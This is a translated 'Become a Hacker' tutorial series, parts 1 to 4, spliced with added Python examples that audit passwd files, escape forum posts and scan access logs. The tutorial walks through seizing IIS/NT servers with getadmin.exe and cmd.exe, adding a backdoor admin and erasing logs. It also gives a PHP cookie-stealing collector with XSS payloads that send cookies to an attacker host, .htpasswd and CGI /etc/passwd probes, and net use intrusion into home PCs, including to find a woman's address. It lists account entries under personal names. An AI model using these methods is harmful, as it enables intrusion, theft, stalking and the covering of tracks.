    ConvexOS 11              /etc/shadow                      *
    DG/UX                    /etc/tcb/aa/user/                *
    EP/IX                    /etc/shadow                      x
    HP-UX                    /.secure/etc/passwd              *
    IRIX 5                   /etc/shadow                      x
    Linux 1.1                /etc/shadow                      *
    OSF/1                    /etc/passwd[.dir|.pag]           *
    SCO Unix #.2.x           /tcb/auth/files/ /
    SunOS4.1+c2              /etc/security/passwd.adjunct     ##username
    SunOS 5.0                /etc/shadow                      maps/tables/whatever >
    System V Release 4.0     /etc/shadow                      x
    System V Release 4.2     /etc/security/* database
    Ultrix 4                 /etc/auth[.dir|.pag]             *
    UNICOS                   /etc/udb

Each line begins with the name of the system; find the real system you are after, then follow the path given for it. And finally, some account entries I once cracked; they have probably expired by now:

    arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
    arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
    aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
    armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
    arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
    arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
    aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh

    arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
    arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

To keep their secrets safe I erased their passwords and put the symbol x in their place; see what information you can get out of them. End of Part 1.
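The entries just listed have exactly the seven-field layout described in section 12, with the x placeholder that section 13 explains. The following is an added example, not code from this article: it parses passwd lines into those fields, reports the conditions the two sections tell you to look for (a hash left readable in passwd instead of the shadow file, an empty password field, a uid-0 account that is not root, a shared uid), and builds the kind of password guesses from the GECOS field that section 12 hints at. The sample file is constructed; two names are borrowed from the listing above, the rest are invented, and the 13-character value on the backup line is a made-up stand-in for a readable hash.

```python
"""Parse /etc/passwd entries and audit them for what sections 12 and 13 describe.

Added example, not from the article. The sample file is constructed (two
names are borrowed from the listing above, the rest invented); the 13-
character value in the backup line is a made-up stand-in for a hash that
was left readable in passwd instead of being moved to the shadow file.
"""
from collections import Counter

FIELDS = ("user", "password", "uid", "gid", "gecos", "home", "shell")

# Constructed sample /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
backup:Gj8dj7Hs2kL1A:1590:1000:Backup Operator,Room 12,555-0100:/udd/backup:/bin/sh
toor::0:0:second root:/root:/bin/sh
"""


def parse_passwd_line(line):
    """Split one passwd line into the seven documented fields."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        raise ValueError("expected 7 colon-separated fields: %r" % line)
    rec = dict(zip(FIELDS, parts))
    rec["uid"] = int(rec["uid"])
    rec["gid"] = int(rec["gid"])
    return rec


def password_status(field):
    """Classify the password field of a passwd entry."""
    if field == "":
        return "empty"        # no password required at all
    if field == "x":
        return "shadowed"     # hash lives in the root-only shadow file
    if field.startswith(("*", "!")):
        return "locked"       # no hash can ever match
    return "hash"             # the hash itself is readable here


def audit_passwd(text):
    """Return (records, findings); findings are (user, problem) pairs."""
    records = [parse_passwd_line(l) for l in text.splitlines()
               if l.strip() and not l.startswith("#")]
    uid_count = Counter(r["uid"] for r in records)
    findings = []
    for r in records:
        status = password_status(r["password"])
        if status == "empty":
            findings.append((r["user"], "empty password"))
        elif status == "hash":
            findings.append((r["user"], "hash readable in passwd (not shadowed)"))
        if r["uid"] == 0 and r["user"] != "root":
            findings.append((r["user"], "uid 0 but not root"))
        if uid_count[r["uid"]] > 1:
            findings.append((r["user"], "uid shared with another account"))
    return records, findings


def gecos_wordlist(rec):
    """Password guesses built from the GECOS field, as section 12 suggests."""
    full_name = rec["gecos"].split(",")[0]          # GECOS: name,office,phone,...
    tokens = [t for t in full_name.replace("-", " ").split() if t]
    guesses = {t.lower() for t in tokens}
    guesses.add(rec["user"].lower())
    if tokens:
        guesses.add("".join(tokens).lower())                # e.g. tominhphuong
        guesses.add("".join(t[0] for t in tokens).lower())  # initials
    return sorted(guesses)


if __name__ == "__main__":
    records, findings = audit_passwd(SAMPLE_PASSWD)
    for user, problem in findings:
        print("%-8s %s" % (user, problem))
    print(gecos_wordlist(records[3]))
```

Run it and the two accounts that matter stand out: backup carries its hash in world-readable passwd, and toor is a second uid-0 account with no password at all, which is the kind of entry a defender wants flagged before an attacker finds it. The GECOS-derived guesses are what you would feed, together with a real dictionary, to John the Ripper against the hashes.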

///////////////

Become a Hacker 2
The most basic knowledge to become a hacker, Part 2

14.) What is a virtual port?
A virtual port is a natural number carried in the TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) header. As everyone knows, Windows can run many programs at once, and each of them has its own port for sending and receiving data. Example: a machine with IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server and so on; all of these services run on the one address 127.0.0.1, so when a packet arrives, how does our computer tell which service it is for: the web server, the FTP server or SMTP? That is why ports exist. Each service has a default port number: FTP uses port 21, the web service port 80, POP3 110, SMTP 25, and so on. The network administrator can change these defaults, and if you do not know the port number on a server you cannot connect to the service. You have probably heard of PORT MAPPING without knowing what it is or does. Port mapping is simply moving a service from its default port number to another one. Example: the web server's default port is 80, but sometimes you see http://www.xxx.com:8080; 8080 is the port on host xxx that its administrator mapped from 80 to 8080. (HVA material)

15.) What is DNS?
DNS stands for Domain Name System. A DNS server waits for connections on port 53, so if you want to connect to the server you must connect to port 53. The DNS server translates hostnames made of letters into the corresponding numbers and back. Example: 127.0.0.1 -> localhost and localhost -> 127.0.0.1. (HVA material)

16.) A little about WinGate:
WinGate is a simple program that lets you share connections; for example you can share one modem between two or more machines. WinGate, used with various proxies, can hide you.
How does WinGate hide you? Do as I do: telnet to port 23 on a server running the WinGate telnet proxy and you get the prompt WinGate>. At this prompt type the name of the server, a space and the port you want to connect to. Example:

    telnet wingate.net
    WinGate> victim.com 23

We telnet to port 23 because that is the default port when WinGate is installed. Now the IP address the victim's machine records for us is the IP of the server hosting the WinGate proxy.
How do you find WinGates?
+ If you want static WinGate IPs (addresses that do not change), go to Yahoo or another search site and search for cable modems: many cable-modem users run WinGate so they can share their wide link with the other machines in the house. Or use a port or domain scanner and scan port 1080.
+ To find dynamic WinGate IPs (addresses that change every time the user connects) you can use Domscan or other scanners. With Domscan enter any IP range in the first box and 23 in the second. When you have results, telnet to each address found (as above); if the WinGate> prompt appears you have found a machine running WinGate.
+ In my experience, just download a wingate scanner and try it out; there are plenty on the net.

17.) A little about Traceroute:
Traceroute is a program that lets you determine the path packets take from your machine to a destination system on the Internet. Look at this example:

    C:\windows> tracert 203.94.12.54
    Tracing route to 203.94.12.54 over a maximum of 30 hops
     1 abc.netzero.com (232.61.41.251)                      2 ms     1 ms     1 ms
     2 xyz.Netzero.com (232.61.41.0)                        5 ms     5 ms     5 ms
     3 232.61.41.10 (232.61.41.251)                         9 ms    11 ms    13 ms
     4 we21.spectranet.com (196.01.83.12)                 535 ms   549 ms   513 ms
     5 isp.net.ny (196.23.0.0)                            562 ms   596 ms   600 ms
     6 196.23.0.25 (196.23.0.25)                         1195 ms  1204 ms
     7 backbone.isp.ny (198.87.12.11)                    1208 ms  1216 ms  1233 ms
     8 asianet.com (202.12.32.10)                        1210 ms  1239 ms  1211 ms
     9 south.asinet.com (202.10.10.10)                   1069 ms  1087 ms  1122 ms
    10 backbone.vsnl.net.in (203.98.46.01)               1064 ms  1109 ms  1061 ms
    11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01)  1185 ms  1146 ms  1203 ms
    12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02)       ms  1159 ms  1073 ms
    13 mtnl.net.in (203.194.56.00)                       1052 ms   642 ms   658 ms

I want to know the path from my machine to an Internet host with IP address 203.94.12.54, so I tracert it! As you can see above, packets from my machine must pass through 13 hops to reach 203.94.12.54. That is the path the packets take.
Look at the next example:

    host2 # traceroute xyz.com
    traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
    1 isp.net (202.xy.34.12)  20ms  10ms  10ms
    2 xyz.com (202.xx.12.34)  130ms  130ms  130ms

+ The first line gives the hostname and IP address of the destination system. It also tells us that TTL <= 30 and that the datagram is 40 bytes (20-byte IP header + 8-byte UDP header + 12 bytes of user data).
+ The second line shows that the first router to receive the datagram is 202.xy.34.12; the TTL when it reached this router was 1. The router returns an ICMP error message, Time Exceeded, to traceroute, which then sends the next datagram towards the destination.
+ The third line: xyz.com (202.xx.12.34) receives a datagram with TTL=1 (the first router decremented it: TTL=2-1=1). But xyz.com is not a router; it returns an ICMP error message, Port Unreachable. When traceroute receives that message it knows it has reached the destination xyz.com and stops.
+ If a router does not reply within 5 seconds, traceroute prints an asterisk (*) for the unknown hop and continues sending datagrams towards the destination.
Note: in Windows: tracert hostname; in Unix: traceroute hostname. (viethacker.net material)

18.) Ping and how to use it:
Ping is a very simple concept but very useful for diagnosing a network. The history of the word: ping is the sound a submarine sends out to find out whether another object is near it; if something is near, the sound wave hits it and the echo that comes back is the "pong", and the submarine knows something is close.
On the Internet the idea of ping is very like the history above. The ping command sends an ICMP (Internet Control Message Protocol) packet to a host; if the host "pongs" back, the host exists (or at least is alive). Ping also tells us how long a data packet takes to travel from our machine to a host.

Ping is easy: open MS-DOS and type ping ip_address; by default it pings 4 times, but you can also type

    ping ip.address -t

which makes the machine ping forever. To change the size of the ping:

    ping -l (size) ip_address

What ping does is send a packet to a computer and measure how long it takes to get there and come back; that gives the speed of the connection, as the time a packet needs to go out and return (the round-trip time). Ping can also be used to slow down or crash a system by ping flooding. Windows 98 hangs after a minute of ping flood (the connection buffer overflows from too many connections, so Windows decides to take a rest). A ping flood attack takes a lot of your own bandwidth, and you need more bandwidth than the opponent (unless the opponent is a Windows 98 machine and you have an average modem, in which case you knock the opponent over after roughly a minute of flooding). Ping floods are not very effective against slightly stronger targets unless you have many lines and control a fairly large number of servers that ping at the same time, so that your combined bandwidth exceeds the opponent's. Note: the -t option in DOS does not produce a ping flood; it only pings the target continuously, with pauses between consecutive pings. On Unix and Linux systems you can use ping -f to produce a real flood: it sends a new request as fast as the replies come back, and on most systems it requires root. Whether -f is available depends on the ping implementation the system ships, not on whether the system is a "real" Unix. (HVA and viethacker.net material)

19.) Technique for breaking into Windows NT from the Internet:
This was the first hacking lesson I practised when I began studying hacking, and now I will pass it on to you. You will need some time to carry it out; it is easy but hard. Let us begin:
First you need to find a server running IIS.
Then go to DOS and type FTP. Example:

    c:\> ftp www.dodgyinc.com

(when I practised this the site still worked; I do not know whether they have fixed it now, if anyone has another site post it so everyone can try). If the connection succeeds you will see lines like these:

    Connected to www.dodgyinc.com.
    220 Vdodgy Microsoft FTP Service (Version 3.0).
    User (www.dodgyinc.com:(none)):

What we see above contains very important information: it tells us the machine's NetBIOS name is Vdodgy. From that you can deduce the account name NT uses, which we can exploit; by default the account the FTP service is given, if it has not been renamed, is IUSR_VDODGY. Remember it, it will be useful to us. Enter anonymous as the user and this appears:

    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:

Now the password is whatever it is, we do not know it yet, but try entering anonymous as the password. If that is wrong, log in to the FTP server again, and this time do not use anonymous but Guest, and try guest as the password. Now type, in DOS:

    cd /c

and you will see the result if you got in. Now quickly look for the cgi-bin directory. If you are lucky you will find it easily: administrators usually put cgi-bin right where we have just landed so they can manage things more easily. The cgi-bin directory may hold programs you can abuse to run from your web browser. Let's start the fun.
First change into cgi-bin and issue the binary command (you may not need it), then type put cmd.exe. Next you need the hacking files to put in this directory: find on the net the two most important files, getadmin.exe and gasys.dll. Download them and, once you have them, put them into cgi-bin. OK, that is all; close the DOS window. Now type this address into your browser:

    http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

After a few seconds you get the reply below:

    CGI Error
    The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
    Congratulations , now account IUSR_VDODGY have administrator rights!

So you have impersonated the admin to get into the system; what you need now is to create an account for yourself, so type the following into IE:

    http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

That command line creates a login account with user: anhdenday and password: toilahacker. Now give this user admin rights; just type into IE:

    http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

Done. Disconnect, go to Start > Find > Computer and search for www.dodgyinc.com. When it is found, choose Explore; NT's Explorer opens and you enter the user and password (mine: user anhdenday, password toilahacker). One problem: your intrusion into the system is logged, so to erase your tracks go to Winnt\system32\logfiles, open the log file, delete the entries that relate to you, and save. If you want to leave any message about your visit, change the date on the computer with this URL:

    http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

Then delete getadmin.exe and gasys.dll from cgi-bin. The point of getting into this system is to grab the admin's password so that next time you can get in "legitimately", so look for the SAM file (which holds the passwords of the admin and the members) on the system and crack it with l0phtcrack (I have already posted a guide to l0phtcrack 3.02, study it yourselves). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=
Once you have cracked it you have the admin's user name and password; now delete your own account (mine was anhdenday) to be safe. You can do whatever you like in the system, but do not delete all their documents, that would be too cruel. How do you feel, complicated, isn't it? When I tried this hack I fumbled for 4 hours; once you know the way, the second time takes less. In Part 3 I will cover the Linux OS, how to break the password protection of a web site, how to hack a simple web page, and so on.

/////////////////

Become a Hacker 3
The most basic knowledge to become a hacker, Part 3

20.) What is a cookie?
Cookies are small structured pieces of data shared between a web site and the user's browser. Cookies are stored as small text files (under 4k). Sites create them to store, retrieve and recognise information about the users who visit the site and the areas of the site they pass through. That information can include the user's name or identifier, password, interests, habits... The cookie is accepted by the user's browser and saved on the local hard disk; not every browser supports cookies. After one visit to a site, information about the user is saved in the cookie, and on later visits the site can reuse what is in the cookie (for example the details of a forum login) so the user does not have to log in again or re-enter other information. The problem is that many sites reuse the information in the cookie carelessly, check it incompletely, or encode it weakly, which lets a hacker walk through the login door and take control of the site.
A cookie usually has these parts:
+ Name: chosen by the site's programmer
+ Domain: the domain of the server that created and sent the cookie
+ Path: the path on the site for which the cookie is valid
+ Expiry date: the moment the cookie stops being valid
+ Secure: if this flag is set on the cookie, the browser only sends it over an encrypted (https) connection between browser and server
+ Other values: site-specific data the web server stores in order to identify the user later; these values contain no spaces, dots or commas and are limited to 4k
(Viethacker.net material)

21.) Technique for stealing the victim's cookie:
First open Notepad and paste the following code (the PHP below is the original script with its quoting restored, the old $HTTP_GET_VARS and $REMOTE_ADDR globals replaced by $_GET and $_SERVER so it runs on current PHP, and the value of HTML_LINE, which was lost from the text, assumed to be a <br> tag):

    <?php
    define("LINE", "\r\n");
    define("HTML_LINE", "<br>");   // assumed; the original value was lost

    // Print, and return as text, every name/value pair in $arr under an optional title.
    function getvars($arr, $title) {
        $res = "";
        $len = count($arr);
        if ($len > 0) {
            if (strlen($title) > 0) {
                print("[--------$title--------]" . HTML_LINE);
                $res .= "[--------$title--------]" . LINE;
            }
            foreach ($arr as $key => $value) {
                print("[$key]" . HTML_LINE);
                print($arr[$key] . HTML_LINE);
                $res .= "[$key]" . LINE . $arr[$key] . LINE;
            }
        }
        return $res;
    }

    // get current date
    $now = date("Y-m-d H:i:s");
    // init
    $myData = "[-----$now-----]" . LINE;
    // get: the stolen cookie arrives in the query string
    $myData .= getvars($_GET, "");
    // file: one log file per victim IP, e.g. 10.0.0.5.txt
    $file = $_SERVER["REMOTE_ADDR"] . ".txt";
    $mode = "r+";
    if (!file_exists($file)) $mode = "w+";
    $fp = fopen($file, $mode);
    fseek($fp, 0, SEEK_END);
    fwrite($fp, $myData);
    fclose($fp);
    ?>

or:

    <?php
    // Variant that mails the stolen data instead of writing a file.
    $contents = isset($_REQUEST["contents"]) ? $_REQUEST["contents"] : "";
    $header   = isset($_REQUEST["header"])   ? $_REQUEST["header"]   : "";
    if ($contents && $header) {
        mail("victim@yahoo.com", "from mail script", $contents, $header) or die("couldn't email it");
        sleep(2);
    ?>
    <script language="javascript">
    // (the script body is missing from the original text)
    </script>
    <?php
    } else {
        echo "nope";
    }
    ?>

(Replace victim@yahoo.com with your own e-mail address.) Save the Notepad file as <any name>.php (it must end in .php) and upload it to a host that supports PHP; in my example it is abc.php. (Those of you who have built web sites will find this easy, right?) This code steals information (sometimes the cookie as well) from victims when they open content that carries it, and automatically saves the data to a file named <victim's IP>.txt.
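The collector script above only works because some forum puts a user's post into the page unescaped, which is the bug the next section exploits with an <img> tag whose src is a javascript: URL. The following is an added example, not code from this article: a constructed stand-in for such a forum renders the same post body the buggy way and the fixed way (escape everything the user typed, and only then turn a small allowed markup like [b] into tags), and a detector checks whether the rendered page still carries an element with a javascript: URL. The post body and the collector URL inside it are constructed for the demonstration.

```python
"""A forum post rendered with and without the bug that makes cookie theft work.

Added example, not from the article. The forum renderer is a constructed
stand-in for the vulnerable boards it names; the post body uses the
<img src="javascript:..."> payload shape the article describes, pointing
at a placeholder collector URL.
"""
import html
import re

# Constructed post: an image tag whose src is a javascript: URL that writes a
# second <img> whose src carries document.cookie to the attacker's script.
COOKIE_THEFT_POST = (
    "Great board! "
    "<img src=\"javascript:document.write('<img src=http://host_php/abc.php?docs='"
    "+escape(document.cookie)+'>')\">"
)


def render_vulnerable(post_body):
    """What the buggy forum does: user text goes into the page unchanged."""
    return '<div class="post">' + post_body + "</div>"


def render_escaped(post_body):
    """The fix: escape <, >, &, and quotes so markup is displayed, not parsed."""
    return '<div class="post">' + html.escape(post_body, quote=True) + "</div>"


def render_bbcode(post_body):
    """Escape first, then turn only [b]..[/b] and [i]..[/i] into safe tags."""
    safe = html.escape(post_body, quote=True)
    safe = re.sub(r"\[b\](.*?)\[/b\]", r"<b>\1</b>", safe, flags=re.S)
    safe = re.sub(r"\[i\](.*?)\[/i\]", r"<i>\1</i>", safe, flags=re.S)
    return '<div class="post">' + safe + "</div>"


# An img/iframe/a element whose src or href attribute starts with javascript:.
_SCRIPT_URL = re.compile(
    r"""<\s*(?:img|iframe|a)\b[^>]*\b(?:src|href)\s*=\s*["']?\s*javascript:""",
    re.I,
)


def has_script_url(page_html):
    """True when the rendered page contains an element with a javascript: URL."""
    return bool(_SCRIPT_URL.search(page_html))


if __name__ == "__main__":
    print("vulnerable:", has_script_url(render_vulnerable(COOKIE_THEFT_POST)))
    print("escaped:   ", has_script_url(render_escaped(COOKIE_THEFT_POST)))
    print("bbcode:    ", has_script_url(render_bbcode("[b]hi[/b] " + COOKIE_THEFT_POST)))
```

The order in render_bbcode is the point: escaping after inserting the allowed tags would undo them, while inserting tags before escaping would let user text ride along inside them. The regex detector is deliberately narrow (it will not catch every encoding trick browsers tolerate), so treat it as a regression check on your own output, not as a substitute for escaping.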

_ There is one more way to get cookies, used on forums that have this bug but have not fixed it: when posting, you just add the following code to your post:
CODE
document.write(` `)
where host_php is the address you uploaded the cookie-stealing file to, and abc.php is my example file.
_ Example: when applying it inside an img tag, we write:
CODE
`)\>
or:
[CODE img]javascript: Document.write(`&#x3cimg src=http://host_php/docs.php? docs=`+escape(document .cookie)+`&#x3e`)\>
_ You can find websites to try this example on by going to google.com and searching for forums that have this bug with the keyword "Powered by .. forum" for the following forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find forums that have not fixed this bug to practise on; whoever finds one, please share it with everyone.
_ There are many more cookie-stealing snippets that are just as good; look for more yourselves.

22.) How to get past a website's password protection:
_ When you are looking for information on some website, there are places on the site where you will be stopped and a box appears asking for a password; this is a private area hiding secret information reserved for some person or group (the hacking hideout of viethacker.net that the e-chip paper wrote about, for instance). When we click that link it (usually) calls .htpasswd and .htaccess, which sit in the same protected directory of the site. Why the leading dot in the file name `.htaccess`? Files whose names start with a dot `.` are treated by web servers as configuration files. These files are hidden when you browse a directory protected by an .htaccess file. These two files control access to the secure link you want to get into. One manages the passwords and user names, the other manages encrypting the information for the first file. Only when you enter both correctly does the link open. Look at the following example:
CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f
You can read the user names, but can you make sense of the passwords? Of course not. Do you understand why you cannot read them? This is due to

the intervention of the .htaccess file. Because they sit in the same directory and protect each other, we are not foolish enough to try breaking in and ***** that wretched password (when we have no password-***** tool in hand. I am still researching a way to get in directly; if I succeed I will post it for you). Then again, what happens if the .htpasswd sits outside the directory protected by .htaccess? We could grab it easily; look at this example link:
http://www.company.com/cgi-bin/protected/
To check whether the .htpasswd file is protected by .htaccess, enter this URL:
http://www.company.com/cgi-bin/protected/.htpasswd
If you get a reply of `File not found` or similar, the file is certainly not protected; look for it with one of the following URLs:
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
If you still cannot find it, keep trying other similar URLs (it may be sitting right in the root directory) until you find it. Once you have found this file, use John the Ripper or Crackerjack to ***** the passwd stored in it. I am sure you know what to do next: take a valid user name and passwd, get in and see what they are hiding in there, but do not change their passwords or harass them. You can also use this method to get the admin's password, and most members of a closed group are certainly privileged.

23.) What is CGI?
_ CGI stands for Common Gateway Interface. Most websites use CGI programs (called CGI scripts) to do the necessary work 24 hours a day. CGI scripts are really programs written and uploaded to the website in languages that are mainly Perl, C, C++ and VBScript; Perl is the favourite because it is easy to write, takes little space and above all can run continuously 24 hours a day.
_ Usually CGI scripts are kept in the /cgi-bin/ directory of the website, as in this example: http://www.company.com/cgi-bin/login.cgi, with specific jobs such as:
+ Creating a visitor counter.
+ Allowing guests to do some things and not others on your website.

+ Managing members' user names and passwds.
+ Providing a mail service.
+ Providing link pages and passing messages between members.
+ Providing detailed error messages, etc.

24.) The most basic way of hacking a website through CGI scripts:
_ Bug 1: the nph-test-cgi bug
+ Type the name of the vulnerable website into your browser.
+ Append the following at the end: /cgi-bin/nph-test-cgi
+ The URL will now look like this: http://www.servername.com/cgi-bin/nph-test-cgi
+ If it works you will see the directories kept inside. To view a directory, append:
CODE
?/*
+ The file containing passwds is usually kept in the /etc directory, so type the following URL: http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
_ Bug 2: the php.cgi bug
+ Same as above; you just type this URL to get the passwords: http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
The important point is that these are old bugs, so finding websites to practise on is very hard; go to google.com and type the keyword: /cgi-bin/php.cgi?/etc/passwd] or cgi-bin/nph-test-cgi?/etc, then search through the results for a site that has not fixed the bug to practise on.

25.) Technique for breaking into a computer that is online:
_ Breaking into an online computer is a technique that is both easy and hard. You can call it easy when you use the ENT 3 tool, but the problem with using it is that the victim's machine slows down noticeably, and machines that share nothing cannot be entered, so if they switch off you are stuck before you have grabbed an account. There is a quieter way, one that slows things down less and can get in even when the victim shares nothing: using DOS commands to attack. Ok, let us begin:

_ Use an IP scanner such as ENT 3 to scan for the target IP.
_ Go to Start ==> Run and type the command cmd.
_ In the DOS window type the command net view
CODE
+ Example: c:\net view \\203.162.30.xx
_ Look at the result; if it has shares, easy, you just type net use <any drive letter on your machine>: <the victim's share>
+ Example: c:\net use E: \\203.162.30.xx\C
_ If connecting to the victim's machine asks for a passwd, download a passwd-guessing program and use it (I suggest pqwak2 for guessing passwds on machines running Win98 or WinMe, and xIntruder for Win NT). Note that both programs are used the same way: on the first line enter the victim's IP, on the second line the name of the victim's shared drive; with xIntruder you also set its Delay sensibly, 100 on a LAN and around 5000 on the Internet.
_ If the victim's machine has no share, type: net use <any drive letter on your machine>: \\<IP>\c$ (or d$) administrator
+ Example: net use E: \\203.162.30.xx\C$administrator
Sharing through c$ is the default on all machines, with USER administrator.
_ We can use this method to get into the machine of the girl we secretly admire, to look for data about her address (provided she is using a home machine and you are lucky enough to find the address). You just chat on Y!Mass, then go to DOS and type: c:\netstat -n. When you do this, close all other windows and keep only the Y!Mass chat window with her; it makes it easier to work out her IP address. Then use the intrusion method I described above. (Perhaps our tykhung back in the day, courting his online girlfriend, used this to get in and find her address, hehe.) You will succeed if the victim's machine has no firewall or proxy.
==================================================
Many of you have asked me for exact addresses to practise on, but I cannot give them: I learned my lesson from tutorials that gave exact addresses, where after practising and gaining admin rights you deleted their database. HVA would then get the reputation of being the source of destruction on the net. Please understand; if I can, I

will only show the ways to find vulnerable addresses and not give any specific address.
==================================================
In part 4 I will cover the technique for preventing intrusion into your own computer while you are online, a survey of the steps taken when deciding to hack a website, the technique for finding vulnerable websites to practise on, hacking the web through the Gallery bug, etc. GOODLUCK!!!!!!!!!
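Sections 22 and 24 above both leave a clear trace on the server: requests for .htpasswd or .htaccess by name, calls to the old nph-test-cgi and php.cgi scripts, and query strings carrying /etc/passwd or ../ sequences. The following Python is an added example, not code from the tutorial or from any product it names: it parses combined-format access log lines (Apache or nginx) and returns one hit per request matching those patterns, together with the status the server answered, so a 200 against such a probe stands out from a 404. The log lines are constructed for this example and use documentation addresses.

```python
"""Spot the .htpasswd and CGI probes from the sections above in an access log.

Added example; not code from the tutorial. The sample log lines are
constructed (RFC 5737 documentation addresses, not real traffic).
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

VULNERABLE_SCRIPTS = {"nph-test-cgi", "php.cgi"}   # scripts named in section 24
CONFIG_FILES = {".htpasswd", ".htaccess"}           # files section 22 hunts for
SYSTEM_PATH = re.compile(r"/etc/(passwd|shadow|\*)|\.\./", re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target: str) -> List[str]:
    """List the reasons a request target looks like one of the probes above."""
    decoded = unquote(target)            # catch %2F-encoded traversal too
    parts = urlsplit(decoded)
    basename = parts.path.rsplit("/", 1)[-1]
    reasons = []
    if basename in CONFIG_FILES:
        reasons.append(f"direct request for {basename}")
    if basename in VULNERABLE_SCRIPTS:
        reasons.append(f"request to known-vulnerable CGI script {basename}")
    if SYSTEM_PATH.search(decoded):
        reasons.append("system path or directory traversal in request")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per suspicious request, keeping the status the server answered."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry["target"])
        if reasons:
            hits.append({"ip": entry["ip"], "target": entry["target"],
                         "status": entry["status"], "reasons": reasons})
    return hits


# Constructed access log lines.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2002:13:55:36 +0700] "GET /cgi-bin/protected/.htpasswd HTTP/1.0" 404 210 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Oct/2002:13:55:41 +0700] "GET /cgi-bin/nph-test-cgi?/etc/* HTTP/1.0" 200 1532 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Oct/2002:13:55:47 +0700] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 210 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [10/Oct/2002:13:56:02 +0700] "GET /index.html HTTP/1.0" 200 4021 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [10/Oct/2002:13:57:10 +0700] "GET /gallery/view.php?f=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0 "-" "Mozilla/4.0"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["target"]} -> {"; ".join(hit["reasons"])}')
```

A 200 on the nph-test-cgi line is the one to act on: the other probes were refused, but that script answered.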

//////////////////////////

Become a Hacker 4
The most basic knowledge for becoming a Hacker, Part 4

26.) Understanding RPC (Remote Procedure Call):
_ Windows NT provides the ability to use RPC to run distributed applications. Microsoft RPC consists of libraries and services that let distributed applications operate in the Windows NT environment. Distributed applications consist of several processes that carry out some defined task. These processes can run on one or several computers.
_ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must go together with the Microsoft RPC name service interface (NIS). NIS consists of API functions that allow access to many entities in the same name service database (the name service database holds the entities, groups of entities and the history of entities on the server). When Windows NT is installed, Microsoft Locator is automatically chosen as the name service provider. It is the optimal name service provider for a Windows NT network environment.

27.) A simple technique for preventing unauthorised intrusion while online via RPC (Remote Procedure Call):
_ If you suspect that someone has got into your machine or that an admin is watching you through remote desktop, you just turn off the Remote Procedure Call service; at present no program can then watch you through remote desktop. It also blocks most intrusion tools (since most tools are written to connect over remote procedure call (over TCP/IP)). Most trojans also rely on this protocol. How to turn it off: go to Services / Remote Procedure Call (right-click), choose Startup type / Disabled or Manual, then Apply. This is a very effective defence for a PC (add turning off file sharing and it is very hard to get hacked), but in a LAN it will cause you no small amount of trouble, because you will not be able to run the programs that depend on this facility. Depending on how you work, you

have to choose what is sensible. In my opinion, in a LAN installing a firewall is certainly relatively safe. (Based on an article by our big brother khoaimi, admin of HVA)

28.) The steps of hacking a website nowadays:
_ According to the list in the book Hacking Exposed 3, hacking a website usually goes through the following steps:
+ FootPrinting: this is what the hacker does when wanting to gather the maximum amount of information about the server/business/user. It includes details such as IP addresses, Whois, DNS, etc., sometimes official information related to the target. Often the hacker simply uses the search engines on the net to find this information.
+ Scanning: once the information is in hand, the next step is to assess and identify the services the target has. This includes port scanning, identifying the operating system, etc. Tools used here include nmap, WS pingPro, siphon, fscam and many others.
